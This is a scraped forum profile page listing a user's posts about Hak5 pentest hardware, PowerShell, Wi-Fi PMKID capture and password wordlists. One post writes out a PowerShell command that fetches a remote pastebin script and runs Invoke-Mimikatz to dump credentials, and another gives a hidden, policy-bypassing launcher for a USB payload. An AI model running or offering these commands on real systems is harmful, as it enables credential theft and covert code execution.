Jump to content


Dedicated Members
  • Posts

  • Joined

  • Last visited

  • Days Won


Contact Methods

  • Website URL

Profile Information

  • Gender

Recent Profile Visitors

The recent visitors block is disabled and is not being shown to other users.

PoSHMagiC0de's Achievements

  1. We are going to need a VM to compile this and redistribute onto the bunny. You can get the compiling going by install build-essential with aptitude but the Bunny chokes on the compilation on different parts different times. It cannot handle it. If you want to continue to try then apt install build-essential while inet sharing and try the pip install -r requirements.txt again to see if it compiles. You will also need to pip install --upgrade setuptools to get rid of another error. I gave up when I saw it was compiling as I know any compilation I did on the bunny that pushed it usually locks up.
  2. Wait, you launching powershell from within powershell? If you are, that is your issue. Depending on what you are trying to do, you will have to do it differently. If ran from the command line that will work. But if within Powershell then the below will need to be done. Start-Process "Powershell" -argumentlist "/C `"IEX (New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/FvASwLVQ');Invoke-Mimikatz -DumpCreds`"" But if you are already in Powershell, I do not see the need for the above.
  3. Try changing the "-C" to a "/C". I noticed on Windows that sometimes the "-"s break stuff like using in wmi to launch processes with command line arguments.
  4. You can or you can ssh into it and work on the command line if you are L33t enough. It has an internal web interface on the Pineapple. It is not served from their site. I believe the dashboard does connect to their portal which just to pull down news.
  5. Yeah..... I read through this thread twice and still got lost. If I read it correctly from the original question, it is asked why Hak5 products are tied to their servers. Well, they are not. The BashBunny, RUbbr ducky, and all their stuff does not require you to speak back to their server. If you want new firmware and stuff, you can download it and install it but usage does not require..nor does it..talk back to Hak5. The Cloud C2 might and if it does, it will be for product registration since that is one of their only products that has a free and paid tier so it has licenses. So, I do not know of any Hak5 hardware that has a mandatory umbilical back to them. Support you get is all manual. Manual calling/emailing them and manually downloading and installing updates. Hmm, I think the Pineapple speaks back to their server but only to return if there are updates and I believe there is an option to turn that off.
  6. I parsed through the Go code real quick for Bettercap and see there is no output except to the console for gps data. Not even a rest api for it else I would suggest building a service in whatever language you want that can hit the rest api of bettercap to query that data on a time interval. For something like this, kismet might be a better choice. Setup kismet as sensor on your remote devices that can communicate to a kismet instance that is the server. Though, I wouldn't shoot that openly across the inet. Maybe create VPN or SSH tunnels back to server and server it through there? Have the kismet listener listening on local host only for the ssh tunnel or the private vpn network for vpn tunnel. You get it.
  7. This is a Powershell module I have been using for a while now. Figured I will share it here. The git readme is thorough enough to explain how it works. Cool features it has is if you are planning to run your finished script as a command from the command prompt then it warns if you are over the character limit. https://github.com/danielbohannon/Invoke-Obfuscation
  8. Lol. That was a hilarious blunder. I don't have a rooted phone for this device. 😑
  9. Hmm, wonder if encryption software people who have no way of decrypting customer data can just not offer their products to Australia to avoid breaking their software? I would.
  10. You can also get is VPS like Digital Oceans (Bithost is the same thing but with bitcoin) and use the roadwarrior script to setup a quick SSLVPN of your own before heading out and then use that with openvpn to hide your traffic.
  11. One thing I have done with crunch as an experiment to targeted wordlist generation is take a sample wordlist of a target. From that get a list of all unique characters of list (to prevent repetition we do no need and will not make sense). I then choose a minimum word size and max word size I think the word or phrase will be. I be sure to include a space in the character list so phrases can be generated. From that you can generate smaller wordlists only using characters from words you think make up their password using crunch.
  12. Hey, Anyone try out Go yet? Watched a 8 hour youtube video on it (not all at once of course) and been messing with it for almost a month. I like it. I like C but hate the tediousness of it sometimes if you want to do something simple. I like dynamic languages like Python that make it easy to do a lot of things without thinking too hard but hate it doesn't have strict typeness when I want it at runtime unless I implement my own methods of insuring it. Go gives me both and the simple concept of concurrency in it is a plus because we all love trying to handle sharing data among threads. 🙂 Who else has given this language a "Go"? See what I did there? 😛
  13. Try this: powershell -NoP -NonI -W Hidden -Exec Bypass -C "$u=(gwmi win32_volume -Filter {Label='PD'}).Name;cd $u;.\d.cmd;" You passed the name already. No need to reference it in the variable. Surprised it even works in your stand alone tests unless you are already in the folder with the d.cmd file. Also, to remove the extra (") that might be terminating the string you can use "{}" for the filter statement in powershell.
  14. Okay, my bad. I posted the wrong link. Empire team has not updated their version yet. The version that works is still in the pull request and does work for Win10.
  15. hcxdumptool doesn't quit when it has the pmkid plus there is one more tool needed to convert what hcxdumptool gets to a hashcat crackable formatted hash. I looked into automating these but not so simple. I have been messing with scapy with 802.11 and it maybe possible to automate this in python. You will need to setup a channel hopping beacon capture part to get access points. You will need to setup a thread after that to handle association with scapy and monitor it once APs are found. You will need a thread to begin authentication but not finish. The pmkid is usually sent when the AP sends its ANounce. You will just need to figure out how to create the 16800 hash that hashcat can understand to pass it to hashcat. I been busy with a talk for a DevFest that happened here but am free and might look into this. It maybe possible though depending on if you can get association and all that working. You could try aireplay-ng for the association but it doesn't return anything to let you know if it is associated (no error codes or stuff). if the AP os mac filtering then this can be an issue.
  • Create New...